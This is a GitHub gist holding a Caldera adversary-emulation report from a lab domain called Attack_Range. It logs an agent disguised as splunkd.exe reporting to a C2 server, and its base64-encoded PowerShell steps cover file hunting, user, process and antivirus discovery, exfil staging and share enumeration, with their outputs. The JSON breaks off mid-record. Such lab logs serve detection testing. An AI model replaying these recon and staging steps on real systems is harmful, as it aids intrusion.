Skip to content

Instantly share code, notes, and snippets.

@rosplk

rosplk/Caldera Sample Report

Created April 1, 2020 03:00
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save rosplk/727e469e59fdd6a6b0fbdc44e47adee3 to your computer and use it in GitHub Desktop.
Save rosplk/727e469e59fdd6a6b0fbdc44e47adee3 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
Caldera Sample Report
{
"name": "Attack_Range",
"host_group": [
{
"paw": "fasecd",
"group": "red",
"architecture": "amd64",
"platform": "windows",
"server": "http://54.188.251.146:8888",
"location": "C:\\Users\\Public\\splunkd.exe",
"pid": 6524,
"ppid": 5136,
"trusted": true,
"last_seen": "2020-03-22 00:28:28",
"sleep_min": 30,
"sleep_max": 60,
"executors": [
"shellcode_amd64",
"cmd",
"psh"
],
"privilege": "Elevated",
"display_name": "win-dc$ATTACKRANGE\\administrator",
"exe_name": "splunkd.exe",
"host": "win-dc",
"watchdog": 0,
"contact": "http"
}
],
"start": "2020-03-22 00:24:57",
"steps": {
"fasecd": {
"steps": [
{
"ability_id": "90c2efaa-8205-480d-8bb6-61d90dbaf81b",
"command": "R2V0LUNoaWxkSXRlbSBDOlxVc2VycyAtUmVjdXJzZSAtSW5jbHVkZSAqLndhdiAtRXJyb3JBY3Rpb24gJ1NpbGVudGx5Q29udGludWUnIHwgZm9yZWFjaCB7JF8uRnVsbE5hbWV9IHwgU2VsZWN0LU9iamVjdCAtZmlyc3QgNTtleGl0IDA7",
"delegated": "2020-03-22 00:24:57",
"run": "2020-03-22 00:25:28",
"status": 0,
"platform": "windows",
"executor": "psh",
"pid": 6108,
"description": "Locate files deemed sensitive",
"name": "Find files",
"attack": {
"tactic": "collection",
"technique_name": "Data from Local System",
"technique_id": "T1005"
}
},
{
"ability_id": "90c2efaa-8205-480d-8bb6-61d90dbaf81b",
"command": "R2V0LUNoaWxkSXRlbSBDOlxVc2VycyAtUmVjdXJzZSAtSW5jbHVkZSAqLnltbCAtRXJyb3JBY3Rpb24gJ1NpbGVudGx5Q29udGludWUnIHwgZm9yZWFjaCB7JF8uRnVsbE5hbWV9IHwgU2VsZWN0LU9iamVjdCAtZmlyc3QgNTtleGl0IDA7",
"delegated": "2020-03-22 00:24:57",
"run": "2020-03-22 00:25:36",
"status": 0,
"platform": "windows",
"executor": "psh",
"pid": 5948,
"description": "Locate files deemed sensitive",
"name": "Find files",
"attack": {
"tactic": "collection",
"technique_name": "Data from Local System",
"technique_id": "T1005"
}
},
{
"ability_id": "90c2efaa-8205-480d-8bb6-61d90dbaf81b",
"command": "R2V0LUNoaWxkSXRlbSBDOlxVc2VycyAtUmVjdXJzZSAtSW5jbHVkZSAqLnBuZyAtRXJyb3JBY3Rpb24gJ1NpbGVudGx5Q29udGludWUnIHwgZm9yZWFjaCB7JF8uRnVsbE5hbWV9IHwgU2VsZWN0LU9iamVjdCAtZmlyc3QgNTtleGl0IDA7",
"delegated": "2020-03-22 00:24:57",
"run": "2020-03-22 00:25:44",
"status": 0,
"platform": "windows",
"executor": "psh",
"pid": 5252,
"description": "Locate files deemed sensitive",
"name": "Find files",
"attack": {
"tactic": "collection",
"technique_name": "Data from Local System",
"technique_id": "T1005"
}
},
{
"ability_id": "c0da588f-79f0-4263-8998-7496b1a40596",
"command": "JGVudjp1c2VybmFtZQ==",
"delegated": "2020-03-22 00:24:57",
"run": "2020-03-22 00:25:52",
"status": 0,
"platform": "windows",
"executor": "psh",
"pid": 3576,
"description": "Find user running agent",
"name": "Identify active user",
"attack": {
"tactic": "discovery",
"technique_name": "System Owner/User Discovery",
"technique_id": "T1033"
},
"output": "administrator\r"
},
{
"ability_id": "6469befa-748a-4b9c-a96d-f191fde47d89",
"command": "TmV3LUl0ZW0gLVBhdGggIi4iIC1OYW1lICJzdGFnZWQiIC1JdGVtVHlwZSAiZGlyZWN0b3J5IiAtRm9yY2UgfCBmb3JlYWNoIHskXy5GdWxsTmFtZX0gfCBTZWxlY3QtT2JqZWN0",
"delegated": "2020-03-22 00:24:57",
"run": "2020-03-22 00:25:56",
"status": 0,
"platform": "windows",
"executor": "psh",
"pid": 5676,
"description": "create a directory for exfil staging",
"name": "Create staging directory",
"attack": {
"tactic": "collection",
"technique_name": "Data Staged",
"technique_id": "T1074"
},
"output": "C:\\Users\\Administrator\\staged\r"
},
{
"ability_id": "feaced8f-f43f-452a-9500-a5219488abb8",
"command": "R2V0LVdtaU9iamVjdCAtQ2xhc3MgV2luMzJfVXNlckFjY291bnQ=",
"delegated": "2020-03-22 00:24:57",
"run": "2020-03-22 00:26:01",
"status": 0,
"platform": "windows",
"executor": "psh",
"pid": 6692,
"description": "Identify all local users",
"name": "Identify local users",
"attack": {
"tactic": "discovery",
"technique_name": "Permission Groups Discovery",
"technique_id": "T1069"
},
"output": "\r\rAccountType : 512\rCaption : ATTACKRANGE\\Administrator\rDomain : ATTACKRANGE\rSID : S-1-5-21-1511907433-3423355854-30249204-500\rFullName : \rName : Administrator\r\rAccountType : 512\rCaption : ATTACKRANGE\\Guest\rDomain : ATTACKRANGE\rSID : S-1-5-21-1511907433-3423355854-30249204-501\rFullName : \rName : Guest\r\rAccountType : 512\rCaption : ATTACKRANGE\\krbtgt\rDomain : ATTACKRANGE\rSID : S-1-5-21-1511907433-3423355854-30249204-502\rFullName : \rName : krbtgt\r\rAccountType : 512\rCaption : ATTACKRANGE\\DefaultAccount\rDomain : ATTACKRANGE\rSID : S-1-5-21-1511907433-3423355854-30249204-503\rFullName : \rName : DefaultAccount\r\r\r\r"
},
{
"ability_id": "3b5db901-2cb8-4df7-8043-c4628a6a5d5a",
"command": "JG93bmVycyA9IEB7fTtnd21pIHdpbjMyX3Byb2Nlc3MgfCUgeyRvd25lcnNbJF8uaGFuZGxlXSA9ICRfLmdldG93bmVyKCkudXNlcn07JHBzID0gZ2V0LXByb2Nlc3MgfCBzZWxlY3QgcHJvY2Vzc25hbWUsSWQsQHtsPSJPd25lciI7ZT17JG93bmVyc1skXy5pZC50b3N0cmluZygpXX19O2ZvcmVhY2goJHAgaW4gJHBzKSB7ICAgIGlmKCRwLk93bmVyIC1lcSAiYWRtaW5pc3RyYXRvciIpIHsgICAgICAgICRwOyAgICB9fQ==",
"delegated": "2020-03-22 00:26:03",
"run": "2020-03-22 00:26:07",
"status": 0,
"platform": "windows",
"executor": "psh",
"pid": 4068,
"description": "Get process info for processes running as a user",
"name": "Find user processes",
"attack": {
"tactic": "discovery",
"technique_name": "Process Discovery",
"technique_id": "T1057"
},
"output": "\rProcessName Id Owner \r----------- -- ----- \rconhost 2020 administrator\rconhost 2548 administrator\rconhost 5320 administrator\rexplorer 816 administrator\rpowershell 4068 administrator\rpowershell 5136 administrator\rrdpclip 4648 administrator\rRuntimeBroker 3568 administrator\rSearchUI 5380 administrator\rShellExperienceHost 5268 administrator\rsihost 1468 administrator\rsplunkd 6524 administrator\rsvchost 4680 administrator\rtaskhostw 3900 administrator\rwinrshost 2448 administrator\r\r\r"
},
{
"ability_id": "2dece965-37a0-4f70-a391-0f30e3331aba",
"command": "d21pYyAvTkFNRVNQQUNFOlxccm9vdFxTZWN1cml0eUNlbnRlcjIgUEFUSCBBbnRpVmlydXNQcm9kdWN0IEdFVCAvdmFsdWU=",
"delegated": "2020-03-22 00:26:03",
"run": "2020-03-22 00:26:15",
"status": 1,
"platform": "windows",
"executor": "psh",
"pid": 4720,
"description": "Identify AV",
"name": "Discover antivirus programs",
"attack": {
"tactic": "discovery",
"technique_name": "Security Software Discovery",
"technique_id": "T1063"
},
"output": "ERROR:\r\rDescription = Not found\r\r"
},
{
"ability_id": "5c4dd985-89e3-4590-9b57-71fed66ff4e2",
"command": "Z3ByZXN1bHQgL1I=",
"delegated": "2020-03-22 00:26:03",
"run": "2020-03-22 00:26:20",
"status": 0,
"platform": "windows",
"executor": "psh",
"pid": 4468,
"description": "Summary of permission and security groups",
"name": "Permission Groups Discovery",
"attack": {
"tactic": "discovery",
"technique_name": "Permission Groups Discovery",
"technique_id": "T1069"
},
"output": "\rMicrosoft (R) Windows (R) Operating System Group Policy Result tool v2.0\rc 2016 Microsoft Corporation. All rights reserved.\r\rCreated on 3/22/2020 at 12:26:20 AM\r\r\r\rRSOP data for ATTACKRANGE\\administrator on WIN-DC : Logging Mode\r-----------------------------------------------------------------\r\rOS Configuration: Primary Domain Controller\rOS Version: 10.0.14393\rSite Name: Default-First-Site-Name\rRoaming Profile: N/A\rLocal Profile: C:\\Users\\Administrator\rConnected over a slow link?: No\r\r\rCOMPUTER SETTINGS\r------------------\r CN=WIN-DC,OU=Domain Controllers,DC=attackrange,DC=local\r Last time Group Policy was applied: 3/22/2020 at 12:22:51 AM\r Group Policy was applied from: win-dc.attackrange.local\r Group Policy slow link threshold: 500 kbps\r Domain Name: ATTACKRANGE\r Domain Type: Windows 2008 or later\r\r Applied Group Policy Objects\r -----------------------------\r Default Domain Controllers Policy\r Default Domain Policy\r\r The following GPOs were not applied because they were filtered out\r -------------------------------------------------------------------\r Local Group Policy\r Filtering: Not Applied (Empty)\r\r The computer is a part of the following security groups\r -------------------------------------------------------\r System Mandatory Level\r Everyone\r BUILTIN\\Users\r NT AUTHORITY\\SERVICE\r CONSOLE LOGON\r NT AUTHORITY\\Authenticated Users\r This Organization\r BITS\r CertPropSvc\r DcpSvc\r dmwappushservice\r DsmSvc\r Eaphost\r IKEEXT\r iphlpsvc\r lfsvc\r MSiSCSI\r NcaSvc\r NetSetupSvc\r RasAuto\r RasMan\r RemoteAccess\r Schedule\r SCPolicySvc\r SENS\r SessionEnv\r SharedAccess\r ShellHWDetection\r UsoSvc\r wercplsupport\r Winmgmt\r wisvc\r wlidsvc\r WpnService\r wuauserv\r LOCAL\r BUILTIN\\Administrators\r \r\rUSER SETTINGS\r--------------\r CN=Administrator,CN=Users,DC=attackrange,DC=local\r Last time Group Policy was applied: 3/21/2020 at 11:57:49 PM\r Group Policy was applied from: win-dc.attackrange.local\r Group Policy slow link threshold: 500 kbps\r Domain Name: ATTACKRANGE\r Domain Type: Windows 2008 or later\r \r Applied Group Policy Objects\r -----------------------------\r N/A\r\r The following GPOs were not applied because they were filtered out\r -------------------------------------------------------------------\r Local Group Policy\r Filtering: Not Applied (Empty)\r\r The user is a part of the following security groups\r ---------------------------------------------------\r Domain Users\r Everyone\r BUILTIN\\Administrators\r BUILTIN\\Users\r BUILTIN\\Pre-Windows 2000 Compatible Access\r REMOTE INTERACTIVE LOGON\r NT AUTHORITY\\INTERACTIVE\r NT AUTHORITY\\Authenticated Users\r This Organization\r LOCAL\r Group Policy Creator Owners\r Domain Admins\r Schema Admins\r Enterprise Admins\r Authentication authority asserted identity\r Denied RODC Password Replication Group\r High Mandatory Level\r "
},
{
"ability_id": "8c06ebf8-bacf-486b-bd77-21ba8c5a5777",
"command": "JE5hbWVTcGFjZSA9IEdldC1XbWlPYmplY3QgLU5hbWVzcGFjZSAicm9vdCIgLUNsYXNzICJfX05hbWVzcGFjZSIgfCBTZWxlY3QgTmFtZSB8IE91dC1TdHJpbmcgLVN0cmVhbSB8IFNlbGVjdC1TdHJpbmcgIlNlY3VyaXR5Q2VudGVyIjskU2VjdXJpdHlDZW50ZXIgPSAkTmFtZVNwYWNlIHwgU2VsZWN0LU9iamVjdCAtRmlyc3QgMTtHZXQtV21pT2JqZWN0IC1OYW1lc3BhY2UgInJvb3RcJFNlY3VyaXR5Q2VudGVyIiAtQ2xhc3MgQW50aVZpcnVzUHJvZHVjdCB8IFNlbGVjdCBEaXNwbGF5TmFtZSwgSW5zdGFuY2VHdWlkLCBQYXRoVG9TaWduZWRQcm9kdWN0RXhlLCBQYXRoVG9TaWduZWRSZXBvcnRpbmdFeGUsIFByb2R1Y3RTdGF0ZSwgVGltZXN0YW1wIHwgRm9ybWF0LUxpc3Q7",
"delegated": "2020-03-22 00:26:03",
"run": "2020-03-22 00:26:24",
"status": 1,
"platform": "windows",
"executor": "psh",
"pid": 6940,
"description": "Identify Firewalls",
"name": "Identify Firewalls",
"attack": {
"tactic": "discovery",
"technique_name": "Security Software Discovery",
"technique_id": "T1063"
},
"output": "Get-WmiObject : Invalid parameter \rAt line:1 char:189\r+ ... ct -First 1;Get-WmiObject -Namespace \"root\\$SecurityCenter\" -Class An ...\r+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r + CategoryInfo : InvalidOperation: (:) [Get-WmiObject], ManagementException\r + FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand\r \r"
},
{
"ability_id": "b22b3b47-6219-4504-a2e6-ae8263e49fc3",
"command": "bmx0ZXN0IC9kY2xpc3Q6JVVTRVJET01BSU4l",
"delegated": "2020-03-22 00:26:03",
"run": "2020-03-22 00:26:33",
"status": 0,
"platform": "windows",
"executor": "psh",
"pid": 5752,
"description": "Identify remote domain controller",
"name": "Find domain controller",
"attack": {
"tactic": "discovery",
"technique_name": "Remote System Discovery",
"technique_id": "T1018"
},
"output": "Cannot find DC to get DC list from.Status = 1355 0x54b ERROR_NO_SUCH_DOMAIN\r"
},
{
"ability_id": "530e47c6-8592-42bf-91df-c59ffbd8541b",
"command": "R2V0LVNtYlNoYXJlIHwgQ29udmVydFRvLUpzb24=",
"delegated": "2020-03-22 00:26:03",
"run": "2020-03-22 00:26:38",
"status": 0,
"platform": "windows",
"executor": "psh",
"pid": 6724,
"description": "Network Share Discovery",
"name": "View admin shares",
"attack": {
"tactic": "discovery",
"technique_name": "Network Share Discovery",
"technique_id": "T1135"
},
"output": "[\r {\r \"CimClass\": {\r \"CimSuperClassName\": null,\r \"CimSuperClass\": null,\r \"CimClassProperties\": \"AvailabilityType CachingMode CATimeout ConcurrentUserLimit ContinuouslyAvailable CurrentUsers Description EncryptData FolderEnumerationMode Name Path Scoped ScopeName SecurityDescriptor ShadowCopy ShareState ShareType SmbInstance Special Temporary Volume\",\r \"CimClassQualifiers\": \"ClassVersion = \\\"30\\\" Description = \\\"31\\\" dynamic = True provider = \\\"smbwmiv2\\\"\",\r \"CimClassMethods\": \"CreateShare GrantAccess RevokeAccess BlockAccess UnblockAccess GetAccessControlEntries EnumerateShares GetShare FireShareChangeEvent\",\r \"CimSystemProperties\": \"Microsoft.Management.Infrastructure.CimSystemProperties\"\r },\r \"CimInstanceProperties\": [\r \"AvailabilityType = 0\",\r \"CachingMode = 1\",\r \"CATimeout = 0\",\r \"ConcurrentUserLimit = 0\",\r \"ContinuouslyAvailable = False\",\r \"CurrentUsers = 0\",\r \"Description = \\\"Remote Admin\\\"\",\r \"EncryptData = False\",\r \"FolderEnumerationMode = 1\",\r \"Name = \\\"ADMIN?\\\"\",\r \"Path = \\\"C:\\\\Windows\\\"\",\r \"Scoped = False\",\r \"ScopeName = \\\"*\\\"\",\r \"SecurityDescriptor = \\\"O:SYG:SYD:(A;;GA;;;BA)(A;;GA;;;BO)(A;;G...\",\r \"ShadowCopy = False\",\r \"ShareState = 1\",\r \"ShareType = 0\",\r \"SmbInstance = 0\",\r \"Special = True\",\r \"Temporary = False\",\r \"Volume = \\\"\\\\\\\\?\\\\Volume{c10d87a2-0000-0000-0000-1000...\"\r ],\r \"CimSystemProperties\": {\r \"Namespace\": \"ROOT/Microsoft/Windows/SMB\",\r \"ServerName\": \"WIN-DC\",\r \"ClassName\": \"MSFT_SmbShare\",\r \"Path\": null\r },\r \"PresetPathAcl\": null,\r \"ShareState\": 1,\r \"AvailabilityType\": 0,\r \"ShareType\": 0,\r \"FolderEnumerationMode\": 1,\r \"CachingMode\": 1,\r \"SmbInstance\": 0,\r \"CATimeout\": 0,\r \"ConcurrentUserLimit\": 0,\r \"ContinuouslyAvailable\": false,\r \"CurrentUsers\": 0,\r \"Description\": \"Remote Admin\",\r \"EncryptData\": false,\r \"Name\": \"ADMIN$\",\r \"Path\": \"C:\\\\Windows\",\r \"Scoped\": false,\r \"ScopeName\": \"*\",\r \"SecurityDescriptor\": \"O:SYG:SYD:(A;;GA;;;BA)(A;;GA;;;BO)(A;;GA;;;IU)\",\r \"ShadowCopy\": false,\r \"Special\": true,\r \"Temporary\": false,\r \"Volume\": \"\\\\\\\\?\\\\Volume{c10d87a2-0000-0000-0000-100000000000}\\\\\",\r \"PSComputerName\": null\r },\r {\r \"CimClass\": {\r \"CimSuperClassName\": null,\r \"CimSuperClass\": null,\r \"CimClassProperties\": \"AvailabilityType CachingMode CATimeout ConcurrentUserLimit ContinuouslyAvailable CurrentUsers Description EncryptData FolderEnumerationMode Name Path Scoped ScopeName SecurityDescriptor ShadowCopy ShareState ShareType SmbInstance Special Temporary Volume\",\r \"CimClassQualifiers\": \"ClassVersion = \\\"30\\\" Description = \\\"31\\\" dynamic = True provider = \\\"smbwmiv2\\\"\",\r \"CimClassMethods\": \"CreateShare GrantAccess RevokeAccess BlockAccess UnblockAccess GetAccessControlEntries EnumerateShares GetShare FireShareChangeEvent\",\r \"CimSystemProperties\": \"Microsoft.Management.Infrastructure.CimSystemProperties\"\r },\r \"CimInstanceProperties\": [\r \"AvailabilityType = 0\",\r \"CachingMode = 1\",\r \"CATimeout = 0\",\r \"ConcurrentUserLimit = 0\",\r \"ContinuouslyAvailable = False\",\r \"CurrentUsers = 0\",\r \"Description = \\\"Default share\\\"\",\r \"EncryptData = False\",\r \"FolderEnumerationMode = 1\",\r \"Name = \\\"C?\\\"\",\r \"Path = \\\"C:\\\\\\\"\",\r \"Scoped = False\",\r \"ScopeName = \\\"*\\\"\",\r \"SecurityDescriptor = \\\"O:SYG:SYD:(A;;GA;;;BA)(A;;GA;;;BO)(A;;G...\",\r \"ShadowCopy = False\",\r \"ShareState = 1\",\r \"ShareType = 0\",\r \"SmbInstance = 0\",\r \"Special = True\",\r \"Temporary = False\",\r \"Volume = \\\"\\\\\\\\?\\\\Volume{c10d87a2-0000-0000-0000-1000...\"\r ],\r \"CimSystemProperties\": {\r \"Namespace\": \"ROOT/Microsoft/Windows/SMB\",\r \"ServerName\": \"WIN-DC\",\r \"ClassName\": \"MSFT_SmbShare\",\r \"Path\": null\r },\r \"PresetPathAcl\": null,\r \"ShareState\": 1,\r \"AvailabilityType\": 0,\r \"ShareType\": 0,\r \"FolderEnumerationMode\": 1,\r \"CachingMode\": 1,\r \"SmbInstance\": 0,\r \"CATimeout\": 0,\r \"ConcurrentUserLimit\": 0,\r \"ContinuouslyAvailable\": false,\r \"CurrentUsers\": 0,\r \"Description\": \"Default share\",\r \"EncryptData\": false,\r \"Name\": \"C$\",\r \"Path\": \"C:\\\\\",\r \"Scoped\": false,\r \"ScopeName\": \"*\",\r \"SecurityDescriptor\": \"O:SYG:SYD:(A;;GA;;;BA)(A;;GA;;;BO)(A;;GA;;;IU)\",\r \"ShadowCopy\": false,\r \"Special\": true,\r \"Temporary\": false,\r \"Volume\": \"\\\\\\\\?\\\\Volume{c10d87a2-0000-0000-0000-100000000000}\\\\\",\r \"PSComputerName\": null\r },\r {\r \"CimClass\": {\r \"CimSuperClassName\": null,\r \"CimSuperClass\": null,\r \"CimClassProperties\": \"AvailabilityType CachingMode CATimeout ConcurrentUserLimit ContinuouslyAvailable CurrentUsers Description EncryptData FolderEnumerationMode Name Path Scoped ScopeName SecurityDescriptor ShadowCopy ShareState ShareType SmbInstance Special Temporary Volume\",\r \"CimClassQualifiers\": \"ClassVersion = \\\"30\\\" Description = \\\"31\\\" dynamic = True provider = \\\"smbwmiv2\\\"\",\r \"CimClassMethods\": \"CreateShare GrantAccess RevokeAccess BlockAccess UnblockAccess GetAccessControlEntries EnumerateShares GetShare FireShareChangeEvent\",\r \"CimSystemProperties\": \"Microsoft.Management.Infrastructure.CimSystemProperties\"\r },\r \"CimInstanceProperties\": [\r \"AvailabilityType = 0\",\r \"CachingMode = 1\",\r \"CATimeout = 0\",\r \"ConcurrentUserLimit = 0\",\r \"ContinuouslyAvailable = False\",\r \"CurrentUsers = 0\",\r \"Description = \\\"Remote IPC\\\"\",\r \"EncryptData = False\",\r \"FolderEnumerationMode = 1\",\r \"Name = \\\"IPC?\\\"\",\r \"Path = \\\"\\\"\",\r \"Scoped = False\",\r \"ScopeName = \\\"*\\\"\",\r \"SecurityDescriptor = \\\"O:SYG:SYD:(A;;GA;;;BA)(A;;GA;;;BO)(A;;G...\",\r \"ShadowCopy = False\",\r \"ShareState = 1\",\r \"ShareType = 3\",\r \"SmbInstance = 0\",\r \"Special = True\",\r \"Temporary = False\",\r \"Volume\"\r ],\r \"CimSystemProperties\": {\r \"Namespace\": \"ROOT/Microsoft/Windows/SMB\",\r \"ServerName\": \"WIN-DC\",\r \"ClassName\": \"MSFT_SmbShare\",\r \"Path\": null\r },\r \"PresetPathAcl\": null,\r \"ShareState\": 1,\r \"AvailabilityType\": 0,\r \"ShareType\": 3,\r \"FolderEnumerationMode\": 1,\r \"CachingMode\": 1,\r \"SmbInstance\": 0,\r \"CATimeout\": 0,\r \"ConcurrentUserLimit\": 0,\r \"ContinuouslyAvailable\": false,\r \"CurrentUsers\": 0,\r \"Description\": \"Remote IPC\",\r \"EncryptData\": false,\r \"Name\": \"IPC$\",\r \"Path\": \"\",\r \"Scoped\": false,\r \"ScopeName\": \"*\",\r \"SecurityDescriptor\": \"O:SYG:SYD:(A;;GA;;;BA)(A;;GA;;;BO)(A;;GA;;;IU)\",\r \"ShadowCopy\": false,\r \"Special\": true,\r \"Temporary\": false,\r \"Volume\": null,\r \"PSComputerName\": null\r },\r {\r \"CimClass\": {\r \"CimSuperClassName\": null,\r \"CimSuperClass\": null,\r \"CimClassProperties\": \"AvailabilityType CachingMode CATimeout ConcurrentUserLimit ContinuouslyAvailable CurrentUsers Description EncryptData FolderEnumerationMode Name Path Scoped ScopeName SecurityDescriptor ShadowCopy ShareState ShareType SmbInstance Special Temporary Volume\",\r \"CimClassQualifiers\": \"ClassVersion = \\\"30\\\" Description = \\\"31\\\" dynamic = True provider = \\\"smbwmiv2\\\"\",\r \"CimClassMethods\": \"CreateShare GrantAccess RevokeAccess BlockAccess UnblockAccess GetAccessControlEntries EnumerateShares GetShare FireShareChangeEvent\",\r \"CimSystemProperties\": \"Microsoft.Management.Infrastructure.CimSystemProperties\"\r },\r \"CimInstanceProperties\": [\r \"AvailabilityType = 0\",\r \"CachingMode = 1\",\r \"CATimeout = 0\",\r \"ConcurrentUserLimit = 0\",\r \"ContinuouslyAvailable = False\",\r \"CurrentUsers = 0\",\r \"Description = \\\"Logon server share \\\"\",\r \"EncryptData = False\",\r \"FolderEnumerationMode = 1\",\r \"Name = \\\"NETLOGON\\\"\",\r \"Path = \\\"C:\\\\Windows\\\\SYSVOL\\\\sysvol\\\\attackrange.lo...\",\r \"Scoped = False\",\r \"ScopeName = \\\"*\\\"\",\r \"SecurityDescriptor = \\\"O:BAG:SYD:(A;;0x1200a9;;;WD)(A;;FA;;;BA...\",\r \"ShadowCopy = False\",\r \"ShareState = 1\",\r \"ShareType = 0\",\r \"SmbInstance = 0\",\r \"Special = False\",\r \"Temporary = False\",\r \"Volume = \\\"\\\\\\\\?\\\\Volume{c10d87a2-0000-0000-0000-1000...\"\r ],\r \"CimSystemProperties\": {\r \"Namespace\": \"ROOT/Microsoft/Windows/SMB\",\r \"ServerName\": \"WIN-DC\",\r \"ClassName\": \"MSFT_SmbShare\",\r \"Path\": null\r },\r \"PresetPathAcl\": {\r \"AccessRightType\": \"System.Security.AccessControl.FileSystemRights\",\r \"AccessRuleType\": \"System.Security.AccessControl.FileSystemAccessRule\",\r \"AuditRuleType\": \"System.Security.AccessControl.FileSystemAuditRule\",\r \"AreAccessRulesProtected\": false,\r \"AreAuditRulesProtected\": false,\r \"AreAccessRulesCanonical\": true,\r \"AreAuditRulesCanonical\": true,\r \"PSPath\": \"Microsoft.PowerShell.Core\\\\FileSystem::C:\\\\Windows\\\\SYSVOL\\\\sysvol\\\\attackrange.local\\\\SCRIPTS\",\r \"PSParentPath\": \"Microsoft.PowerShell.Core\\\\FileSystem::C:\\\\Windows\\\\SYSVOL\\\\sysvol\\\\attackrange.local\",\r \"PSChildName\": \"SCRIPTS\",\r \"PSDrive\": \"C\",\r \"PSProvider\": \"Microsoft.PowerShell.Core\\\\FileSystem\",\r \"CentralAccessPolicyId\": null,\r \"CentralAccessPolicyName\": null,\r \"Path\": \"Microsoft.PowerShell.Core\\\\FileSystem::C:\\\\Windows\\\\SYSVOL\\\\sysvol\\\\attackrange.local\\\\SCRIPTS\",\r \"Owner\": \"BUILTIN\\\\Administrators\",\r \"Group\": \"NT AUTHORITY\\\\SYSTEM\",\r \"Access\": \"System.Security.AccessControl.FileSystemAccessRule System.Security.AccessControl.FileSystemAccessRule\",\r \"Sddl\": \"O:BAG:SYD:(A;OICI;0x1200a9;;;WD)(A;OICI;FA;;;BA)\",\r \"AccessToString\": \"Everyone Allow ReadAndExecute, Synchronize\\nBUILTIN\\\\Administrators Allow FullControl\",\r \"AuditToString\": \"\"\r },\r \"ShareState\": 1,\r \"AvailabilityType\": 0,\r \"ShareType\": 0,\r \"FolderEnumerationMode\": 1,\r \"CachingMode\": 1,\r \"SmbInstance\": 0,\r \"CATimeout\": 0,\r \"ConcurrentUserLimit\": 0,\r \"ContinuouslyAvailable\": false,\r \"CurrentUsers\": 0,\r \"Description\": \"Logon server share \",\r \"EncryptData\": false,\r \"Name\": \"NETLOGON\",\r \"Path\": \"C:\\\\Windows\\\\SYSVOL\\\\sysvol\\\\attackrange.local\\\\SCRIPTS\",\r \"Scoped\": false,\r \"ScopeName\": \"*\",\r \"SecurityDescriptor\": \"O:BAG:SYD:(A;;0x1200a9;;;WD)(A;;FA;;;BA)\",\r \"ShadowCopy\": false,\r \"Special\": false,\r \"Temporary\": false,\r \"Volume\": \"\\\\\\\\?\\\\Volume{c10d87a2-0000-0000-0000-100000000000}\\\\\",\r \"PSComputerName\": null\r },\r {\r \"CimClass\": {\r \"CimSuperClassName\": null,\r \"CimSuperClass\": null,\r \"CimClassProperties\": \"AvailabilityType CachingMode CATimeout ConcurrentUserLimit ContinuouslyAvailable CurrentUsers Description EncryptData FolderEnumerationMode Name Path Scoped ScopeName SecurityDescriptor ShadowCopy ShareState ShareType SmbInstance Special Temporary Volume\",\r \"CimClassQualifiers\": \"ClassVersion = \\\"30\\\" Description = \\\"31\\\" dynamic = True provider = \\\"smbwmiv2\\\"\",\r \"CimClassMethods\": \"CreateShare GrantAccess RevokeAccess BlockAccess UnblockAccess GetAccessControlEntries EnumerateShares GetShare FireShareChangeEvent\",\r \"CimSystemProperties\": \"Microsoft.Management.Infrastructure.CimSystemProperties\"\r },\r \"CimInstanceProperties\": [\r \"AvailabilityType = 0\",\r \"CachingMode = 1\",\r \"CATimeout = 0\",\r \"ConcurrentUserLimit = 0\",\r \"ContinuouslyAvailable = False\",\r \"CurrentUsers = 0\",\r \"Description = \\\"Logon server share \\\"\",\r \"EncryptData = False\",\r \"FolderEnumerationMode = 1\",\r \"Name = \\\"SYSVOL\\\"\",\r \"Path = \\\"C:\\\\Windows\\\\SYSVOL\\\\sysvol\\\"\",\r \"Scoped = False\",\r \"ScopeName = \\\"*\\\"\",\r \"SecurityDescriptor = \\\"O:BAG:SYD:(A;;0x1200a9;;;WD)(A;;FA;;;BA...\",\r \"ShadowCopy = False\",\r \"ShareState = 1\",\r \"ShareType = 0\",\r \"SmbInstance = 0\",\r \"Special = False\",\r \"Temporary = False\",\r \"Volume = \\\"\\\\\\\\?\\\\Volume{c10d87a2-0000-0000-0000-1000...\"\r ],\r \"CimSystemProperties\": {\r \"Namespace\": \"ROOT/Microsoft/Windows/SMB\",\r \"ServerName\": \"WIN-DC\",\r \"ClassName\": \"MSFT_SmbShare\",\r \"Path\": null\r },\r \"PresetPathAcl\": {\r \"AccessRightType\": \"System.Security.AccessControl.FileSystemRights\",\r \"AccessRuleType\": \"System.Security.AccessControl.FileSystemAccessRule\",\r \"AuditRuleType\": \"System.Security.AccessControl.FileSystemAuditRule\",\r \"AreAccessRulesProtected\": false,\r \"AreAuditRulesProtected\": false,\r \"AreAccessRulesCanonical\": true,\r \"AreAuditRulesCanonical\": true,\r \"PSPath\": \"Microsoft.PowerShell.Core\\\\FileSystem::C:\\\\Windows\\\\SYSVOL\\\\sysvol\",\r \"PSParentPath\": \"Microsoft.PowerShell.Core\\\\FileSystem::C:\\\\Windows\\\\SYSVOL\",\r \"PSChildName\": \"sysvol\",\r \"PSDrive\": \"C\",\r \"PSProvider\": \"Microsoft.PowerShell.Core\\\\FileSystem\",\r \"CentralAccessPolicyId\": null,\r \"CentralAccessPolicyName\": null,\r \"Path\": \"Microsoft.PowerShell.Core\\\\FileSystem::C:\\\\Windows\\\\SYSVOL\\\\sysvol\",\r \"Owner\": \"BUILTIN\\\\Administrators\",\r \"Group\": \"NT AUTHORITY\\\\SYSTEM\",\r \"Access\": \"System.Security.AccessControl.FileSystemAccessRule System.Security.AccessControl.FileSystemAccessRule System.Security.AccessControl.FileSystemAccessRule\",\r \"Sddl\": \"O:BAG:SYD:(A;OICI;0x1200a9;;;WD)(A;OICI;FA;;;AU)(A;OICI;FA;;;BA)\",\r \"AccessToString\": \"Everyone Allow ReadAndExecute, Synchronize\\nNT AUTHORITY\\\\Authenticated Users Allow FullControl\\nBUILTIN\\\\Administrators Allow FullControl\",\r \"AuditToString\": \"\"\r },\r \"ShareState\": 1,\r \"AvailabilityType\": 0,\r \"ShareType\": 0,\r \"FolderEnumerationMode\": 1,\r \"CachingMode\": 1,\r \"SmbInstance\": 0,\r \"CATimeout\": 0,\r \"ConcurrentUserLimit\": 0,\r \"ContinuouslyAvailable\": false,\r \"CurrentUsers\": 0,\r \"Description\": \"Logon server share \",\r \"EncryptData\": false,\r \"Name\": 